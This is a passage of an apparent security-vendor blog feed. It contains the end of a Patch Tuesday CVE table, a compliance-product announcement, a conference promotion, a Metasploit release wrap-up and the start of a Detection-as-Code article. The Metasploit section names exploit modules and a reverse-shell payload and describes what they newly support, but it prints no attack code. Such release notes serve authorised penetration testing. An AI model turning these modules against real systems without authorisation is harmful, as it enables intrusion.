href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34350">CVE-2026-34350</a></td><td><p>Windows Storport Miniport Driver Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40405">CVE-2026-40405</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40414">CVE-2026-40414</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40401">CVE-2026-40401</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40413">CVE-2026-40413</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35422">CVE-2026-35422</a></td><td><p>Windows TCP/IP Driver Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34351">CVE-2026-34351</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40399">CVE-2026-40399</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34334">CVE-2026-34334</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40406">CVE-2026-40406</a></td><td><p>Windows TCP/IP Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33837">CVE-2026-33837</a></td><td><p>Windows TCP/IP Local Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40415">CVE-2026-40415</a></td><td><p>Windows TCP/IP Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42825">CVE-2026-42825</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34338">CVE-2026-34338</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40382">CVE-2026-40382</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40380">CVE-2026-40380</a></td><td><p>Windows Volume Manager Extension Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40408">CVE-2026-40408</a></td><td><p>Windows WAN ARP Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34333">CVE-2026-34333</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34347">CVE-2026-34347</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35417">CVE-2026-35417</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h2>Critical RCEs and EoPs</h2><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33109">CVE-2026-33109</a></td><td><p>Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33844">CVE-2026-33844</a></td><td><p>Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42823">CVE-2026-42823</a></td><td><p>Azure Logic Apps Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42898">CVE-2026-42898</a></td><td><p>Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42833">CVE-2026-42833</a></td><td><p>Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41103">CVE-2026-41103</a></td><td><p>Microsoft SSO Plugin for Jira & Confluence Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41096">CVE-2026-41096</a></td><td><p>Windows DNS Client Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40402">CVE-2026-40402</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41089">CVE-2026-41089</a></td><td><p>Windows Netlogon Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-may-2026</link>
      <guid isPermaLink="false">blt5441ec2842aca93c</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Wed, 13 May 2026 00:22:19 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[How Rapid7 is bringing Cyber GRC closer to security operations]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'><em>Sabeen Malik is </em></span><em>VP, Global Government Affairs and Public Policy at Rapid7.</em><em><br/></em>⠀</p><p><span style='font-size: undefined;'>Security teams need a better way to connect what they detect, what they fix, and what they can prove.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The pace of modern security operations no longer works in defenders’ favor. IBM’s Cost of a Data Breach Report 2025 found that the mean time to identify and contain a breach is now 241 days, even as AI and automation help defenders move faster. At the same time, Rapid7’s 2026 Global Threat Landscape Report shows how quickly attacker behavior is compressing the response window: exploited high and critical severity vulnerabilities more than doubled year over year, increasing 105% from 71 in 2024 to 146 in 2025, while the median time from publication to CISA KEV inclusion fell from 8.5 days to 5.0 days. This is not a future risk. It is today’s operational reality.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It also exposes a governance problem most security programs were not built to solve. Security teams are expected to demonstrate, continuously, that controls are working, that risk is being reduced, and that security investments are delivering measurable outcomes. Point-in-time audit evidence, assembled quarterly, is structurally incompatible with an environment where the threat picture changes in minutes.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The underlying issue is not a lack of effort, but a disconnect. Security data lives in one place, remediation happens in another, and evidence for auditors is assembled somewhere else. When leadership asks what changed, what was fixed, and what risk remains, teams are left stitching the story together manually producing reports that reflect where the organization was, not where it is.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Cyber GRC closes that gap by bringing governance, risk management, and compliance closer to the security data and workflows teams already rely on.</span></p><h2>Why security operations and compliance need connected data</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For years, security operations and GRC have run in parallel. One team manages threats, exposures, and remediation. Another manages policies, controls, audits, and evidence. Both aim to reduce risk, but typically without shared context or shared data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That separation is no longer sustainable. Vulnerability exploitation rose 34% year-over-year and now accounts for 20% of all breaches, with a median of zero days between critical vulnerability publication and mass exploitation (Verizon DBIR 2025). Supply chain breaches doubled, now representing 30% of all incidents. Ransomware appeared in 44% of breaches – up 37% from the prior year.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Security leaders operating in this environment face an expectation that compliance teams were not designed to meet alone: continuous proof that controls are effective against adversaries who operate at machine speed. When AI agents can autonomously chain every phase of an attack with minimal human oversight, a quarterly audit cycle is not an assurance, but a historical record.</span></p><h2>Why Cyber GRC matters now</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Boards are no longer satisfied with compliance status reports. They want dollarized risk scenarios and evidence that remediation is actually reducing exposure -- not just that it was attempted.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Two pressures are converging. First, environmental complexity: modern infrastructure spans cloud, SaaS, remote endpoints, OT systems, and third-party providers. The perimeter is everywhere, and so is the attack surface. Second, regulatory expectation: SEC, NIS2, DORA, and CMMC now require demonstrable control effectiveness, not just documented policies. Both pressures demand a model that brings security activity, compliance readiness, and accountability into the same view.</span></p><h2>What Cyber GRC changes for security and compliance teams</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Cyber GRC changes how organizations use security data. Instead of disconnected, point-in-time artifacts, it enables teams to build governance and compliance workflows directly on top of real security telemetry – so evidence reflects the current state of the environment, not a snapshot assembled weeks before an audit.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In practice, this means connecting findings, controls, remediation activity, and evidence so teams can see what issues exist, who owns the response, how remediation is progressing, and what that means for overall readiness. This also helps address the compliance-theater problem directly: many programs are designed to pass audits rather than reduce actual exposure, creating false confidence and misallocated resources. Grounding compliance evidence in live security telemetry -- rather than manual documentation -- means teams can tell the difference between controls that are configured and controls that are working.</span></p><h2>How connected security data strengthens compliance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Compliance has historically been treated as a separate process that happens alongside security operations. In practice, it depends on the same data. The telemetry that surfaces a critical finding also determines whether a control is operating effectively.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>When evidence is generated directly from operational systems, teams spend less time assembling reports and more time improving controls. Continuous monitoring for control drift allows organizations to move from reactive audit preparation toward a consistent assurance model. Third-party risk -- now a source of 30% of all breaches -- benefits particularly, since continuous TPRM monitoring surfaces supply chain exposure in real time rather than at the next assessment cycle.</span></p><h2>How Rapid7 Cyber GRC builds on existing security workflows</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This shift does not require rebuilding security programs from the ground up. With the launch of Rapid7 Cyber GRC, customers can use the security data and workflows already connected through the Command Platform to support audits, assessments, and ongoing control validation. Capabilities such as HITRUST E1 control coverage provide continuous monitoring and automated evidence collection, while features like audit-ready user access exports and unified policy data reduce manual effort across SOC 2, NIST CSF, PAI, and other common frameworks.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>When NIST CSF 2.0, MITRE ATT&CK, and FAIR-based risk quantification inform the evidence model rather than just the policy library, compliance becomes a byproduct of strong security operations -- not a parallel burden.</span></p><h2>Rapid7 is launching Cyber GRC to connect security operations, risk, and compliance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations do not need more disconnected processes for managing risk. They need a way to connect what they detect, what they fix, and what they can prove in a way that stands up to regulatory scrutiny, board-level oversight -- and keeps pace with adversaries who operate at AI speed.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That is why Rapid7 is launching Cyber GRC: to help customers bring security operations, governance, and compliance into a single, continuous view so teams can reduce risk, improve readiness, and demonstrate progress with confidence.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For current clients, reach out to your account team to </span><a href="https://information.rapid7.com/Compliance-Solution-Interest-Confirmation.html" target="_blank"><span style='font-size: undefined;'>get early access</span></a><span style='font-size: undefined;'> to Rapid7's Cyber GRC solution and help shape what comes next.</span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'><em>Sources: </em></span><a href="https://www.ibm.com/reports/data-breach" target="_blank"><span style='font-size: undefined;'><em>IBM Cost of a Data Breach Report 2025</em></span></a><span style='font-size: undefined;'><em> | </em></span><a href="https://www.rapid7.com/research/report/global-threat-landscape-report-2026/" target="_blank"><span style='font-size: undefined;'><em>Rapid7’s 2026 Global Threat Landscape Report</em></span></a><em></em><a href="https://www.crowdstrike.com/en-gb/global-threat-report/"><span style='font-size: undefined;'><em> </em></span></a><span style='font-size: undefined;'><em>| </em></span><a href="https://www.verizon.com/business/resources/T16f/reports/2025-dbir-data-breach-investigations-report.pdf" target="_blank"><span style='font-size: undefined;'><em>Verizon DBIR 2025</em></span></a></p>]]></description>
      <link>https://www.rapid7.com/blog/post/cds-rapid7-cyber-grc-secops-compliance</link>
      <guid isPermaLink="false">blt6719fe25044a0d70</guid>
      <category><![CDATA[Compliance]]></category><dc:creator><![CDATA[Sabeen Malik]]></dc:creator>
      <pubDate>Tue, 12 May 2026 13:17:51 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebc2810157aecfaf/68af2715c53b04810df94abb/blog-hero-generic-pixel.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Final Countdown: Last Chance to Join the Rapid7 Global Cybersecurity Summit]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>The </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-9&amp;utm_campaign=global-pla-2026-global-virtual-summit-prospect-eng-etos-25" target="_blank"><span style='font-size: undefined;'>Rapid7 2026 Global Cybersecurity Summit</span></a><span style='font-size: undefined;'> is just around the corner, and with it, a final opportunity to join the conversations shaping how security teams are adapting to a rapidly changing landscape.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Over the past few weeks, we’ve shared a preview of what to expect, from the sessions and speakers to the themes running across the agenda. What has become increasingly clear is how closely these topics are connected. Security teams are being asked to move beyond reacting to incidents and instead understand how attacks begin, how they evolve, and how decisions can be made earlier with greater confidence.</span></p><h2 style="direction: ltr;">What you will gain from attending</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Across two days, the summit is structured to reflect how security teams actually operate. The first day builds a shared understanding of how the threat landscape has shifted, while the second day offers more focused sessions tailored to both leaders and practitioners.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Sessions such as </span><span style='font-size: undefined;'><em>The Reality of Running a SOC in 2026</em></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><em>Inside the Modern SOC</em></span><span style='font-size: undefined;'> explore how attacks unfold in practice, following signals from initial access through to response. These discussions highlight how analysts interpret activity across identity, cloud, and endpoint environments, and how decisions are made when multiple signals compete for attention.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Other sessions, including </span><span style='font-size: undefined;'><em>Beyond the Vulnerability List</em></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><em>From Cloud Exposure to Runtime Attack</em></span><span style='font-size: undefined;'>, focus on how exposure is changing the way teams prioritize risk. The emphasis is on understanding context and how exposed assets actually are to attackers, helping teams determine which issues are most likely to lead to impact and where effort should be focused.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Alongside this, sessions like </span><span style='font-size: undefined;'><em>The AI Dilemma: Automating Defense Without Surrendering Judgment</em></span><span style='font-size: undefined;'> examine how AI is being applied within SOC workflows. The discussion moves beyond theory and looks at how teams are balancing automation with human oversight, ensuring that speed does not come at the expense of trust or accountability.</span></p><h2 style="direction: ltr;">What’s changing for security teams right now</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Security operations are evolving in response to changes in both attacker behavior and organizational complexity. Environments are more distributed, signals are more fragmented, and the time available to respond continues to shrink.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As a result, the focus is shifting toward earlier action, better prioritization, and more connected decision-making. This means linking exposure with detection, reducing unnecessary noise, and building workflows that allow teams to act with clarity when it matters most.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Across the summit, these ideas are explored from multiple perspectives, but they consistently point toward the same outcome. Teams that can connect context, visibility, and response are better positioned to reduce risk before it becomes an incident.</span></p><h2 style="direction: ltr;">Secure your place</h2><p style="direction: ltr;"><span style='font-size: undefined;'>With the event approaching, this is the final opportunity to register and take part in these discussions. Whether you are responsible for strategy, operations, or day-to-day detection and response, the summit is designed to provide practical insights that can be applied immediately.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Join us on May 12–13 and see how security teams are putting these approaches into practice across real environments.</span></p><p style="direction: ltr;"><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-9&amp;utm_campaign=global-pla-2026-global-virtual-summit-prospect-eng-etos-25" target="_blank"><span style='font-size: undefined;'>Register now</span></a></p>]]></description>
      <link>https://www.rapid7.com/blog/post/it-last-chance-rapid7-global-cybersecurity-summit</link>
      <guid isPermaLink="false">bltb61c641b0f094e9d</guid>
      <category><![CDATA[Events]]></category><dc:creator><![CDATA[Emma Burdett]]></dc:creator>
      <pubDate>Mon, 11 May 2026 12:54:26 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7652fa46396969f5/69a59e6cfbdb4d75ad7755a9/REQ-14706_-_1600x900px.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 05/08/2026]]></title>
      <description><![CDATA[<h1>Spring cleanup</h1><p>This week’s Metasploit updates focused on foundational improvements and expanded target reach. Key enhancements were made to the recently released Copy Fail exploit module, which now benefits from payload fixes in linux/x64/exec and linux/armle/exec. These changes expand its capability, enabling the use of the cmd/unix/python/meterpreter/reverse_tcp payload on x64 targets and introducing support for ARMLE Linux. Additionally, the exploit/multi/http/shiro_rememberme_v124_deserialize module has been improved to allow operators to adjust the deserialization chain, enabling exploitation of a broader set of targets. Finally, several critical utility modules, including the FTP anonymous scanner and other FTP modules, received general fixes and updates.</p><h2>New module content (1)</h2><h3>Anonymous FTP Access Detection</h3><p>Authors: Matteo Cantoni <a href="mailto:goony@nothink.org">goony@nothink.org</a> and g0tmi1k</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21372">#21372</a> contributed by <a href="https://github.com/g0tmi1k">g0tmi1k</a></p><p>Path: scanner/ftp/ftp_anonymous</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-1999-0497&amp;referrer=blog">CVE-1999-0497</a></p><p>Description: This updates the FTP anonymous scanner module. Key changes include moving the module to align with other generic FTP modules, adding and updating CVE references and documentation notes, and cleaning up the output to be more verbose. Additionally, the module now reports service and vulnerability data to the database and stores proof-of-exploitation info in the loot upon a successful run.</p><h2>Enhanced Modules (2)</h2><p>Modules which have either been enhanced, or renamed:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21410">#21410</a> from <a href="https://github.com/inkognitobo">inkognitobo</a> - This improves the exploit/multi/http/shiro_rememberme_v124_deserialize module by adding a JAVA_GADGET_CHAIN datastore option that allows the operator to adjust the chain used for deserialization. This enables the module to exploit additional targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21404">#21404</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This extends the support of Copy Fail to ARMLE Linux targets.</li></ul><h2>Enhancements and features (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21342">#21342</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Defers the loading of some dependencies to improve console boot time.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21372">#21372</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This updates the FTP anonymous scanner module. Key changes include moving the module to align with other generic FTP modules, adding and updating CVE references and documentation notes, and cleaning up the output to be more verbose. Additionally, the module now reports service and vulnerability data to the database and stores proof-of-exploitation info in the loot upon a successful run.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21380">#21380</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Updates multiple FTP modules to now register FTP service information in the database when successfully connecting to an FTP service.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21418">#21418</a> from <a href="https://github.com/kx7m2qd">kx7m2qd</a> - This improves the platform-agnostic library used to obtain the OS architecture with support for shell sessions on Linux, BSD and Mac OSX.</li></ul><h2>Bugs fixed (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21314">#21314</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Fixes a crash when running the scanner/http/trace module with the database enabled and a vulnerability was reported.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21411">#21411</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This fixes a bug in the linux/x64/exec payload that was caused by the CMD datastore option being placed in the assembly source without being escaped.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21413">#21413</a> from <a href="https://github.com/tart0ru5">tart0ru5</a> - Fixes a logic error in the exploits/linux/http/projectsend_unauth_rce module that incorrectly checked if a new user has been created.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21421">#21421</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - This adds extra validation to report_vuln and delete_vuln in Msf::DBManager::Vuln to make sure required fields are present and avoid a crash.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21425">#21425</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Fixes a bug when parsing FTP server responses.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-30T22%3A30%3A05Z..2026-05-08T17%3A05%3A58%2B01%3A00%22">Pull Requests 6.4.131...6.4.132</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.131...6.4.132">Full diff 6.4.131...6.4.132</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-05-08-2026</link>
      <guid isPermaLink="false">blte9c10b3abc885b35</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Alan David Foster]]></dc:creator>
      <pubDate>Fri, 08 May 2026 18:26:10 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0d50271a40a5f14f/6849ab419621d9f3824d5017/metasploit-sky.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Zero Chaos: Scaling Detection Engineering at the Speed of Software, with Detection As Code]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Every engineering team in your organization ships code through a pipeline. They branch, test, review, and deploy. If something breaks, they roll back. If someone asks "what changed?", the answer is in the commit history. This isn't heroic discipline to process; it's just how software gets built.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Now think about how your detection engineering team works.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rules get written in a UI. Maybe copied and pasted from a wiki. There's no peer review; someone clicks "save," and it's live. No test cases validate the logic before deployment. No rollback if something breaks. When an alert suddenly floods your SOC, good luck figuring out what changed and when. When a detection stops firing, you might not notice for weeks.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is, by definition, a </span><span style='font-size: undefined;'><strong>process gap</strong></span><span style='font-size: undefined;'>. And it's one that the rest of engineering solved years ago. The gap becomes manageable through the five custom rules, listed below. As your detections grow, you need the same discipline that every other engineering team already has.</span></p><p><span style='font-size: undefined;'></span></p><table><colgroup data-width='1535'><col style="width:23.973941368078176%"/><col style="width:36.2214983713355%"/><col style="width:39.80456026058632%"/></colgroup><tbody><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>Process Stage</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>How it works in software engineering</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>How it works in detection engineering</strong></span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>Storage</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Git / Version Control</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>UI / Wiki / "Tribal Knowledge"</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>Validation</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Automated CI/CD Tests</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>"Wait and see if it fires"</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>Review</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Peer-reviewed Pull Requests</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Single-user "Save" button</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>Rollback</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>One-click </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>git revert</span></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Manual query deletion</span></p></td></tr></tbody></table><h2>How does this help my security team?</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Detection as Code gives your team a structured, repeatable way to build and manage detections with confidence. Instead of relying on manual updates and guesswork, every change is tested, reviewed, and tracked before it reaches production. Before we get into the </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'>, here's why Detection as Code changes the way your team works:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>A more reliable process.</strong></span><span style='font-size: undefined;'> Every change goes through version control and peer review before it goes live. When something goes wrong, you know exactly what changed, when it changed, and who approved it. Roll back in seconds if needed.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>A safety net of tests.</strong></span><span style='font-size: undefined;'> Inline test cases validate detection logic before deployment. Positive tests prove it catches the threat; negative tests prove it doesn't fire on legitimate activity.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Confidence in what's deployed.</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><strong>terraform plan</strong></span><span style='font-size: undefined;'> previews every change before anything touches production. Terraform state is the authoritative record of your detection estate, not some spreadsheet.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The result is a detection workflow your team can trust. Changes are predictable, validated, and fully traceable, so security teams don’t get caught up in troubleshooting and can focus on improving coverage and overall posture. </span></p><h2>The anatomy of a detection</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Here is what a detection rule looks like using </span><span style='font-size: 